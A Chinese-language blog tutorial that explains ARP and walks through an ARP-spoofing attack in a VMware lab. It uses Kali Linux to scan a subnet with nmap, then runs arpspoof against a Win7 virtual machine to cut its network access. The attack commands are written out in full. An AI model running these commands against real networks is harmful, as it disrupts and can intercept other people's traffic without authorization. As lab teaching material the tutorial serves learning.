Kali——ARP局域网攻击

什么是ARP

ARP ( Address Resolution Protocol)地址转换协议,工作在OSI模型的数据链路层,在以太网中,网络设备之间互相通信是用MAC地址而不是IP地址,ARP协议就是用来把IP地址转换为MAC地址的.

那什么又是arp断网攻击呢? 

简单来说就是就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断。

一.攻击前的准备

1.环境:Vmware,Kali linux,Win7虚拟机一台

2.在Kali的终端上输入ifconfig,从而获得攻击者(Kali)的ip地址以及网卡

3.同样是在Kali的终端上输入route -n,来获取Kali的网关

4.用nmap命令扫描端口。 命令格式是 nmap [-sP 网段]   后面的网段根据当前网络填,比如我kali的ip是192.168.138.128,就填192.168.138.0/24

 这里扫描到Win7虚拟机的IP地址是192.168.138.130

二.开始攻击

使用Arpspoof:

Arpspoof -i 网卡 -t 目标IP网关

这里网卡是eth0 目标IP是192.168.138.130网关是192.168.138.2
所以命令就是:
arpspoof -i eth0 -t 192.168.138.130 192.168.138.2

开始攻击后的演示图:

 三.查看Win7虚拟机的上网情况

 

 

 

 输入ctrl+z 停止攻击后,Win7虚拟机上网恢复正常

 

版权声明:本文为cc0424原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/cc0424/p/14202297.html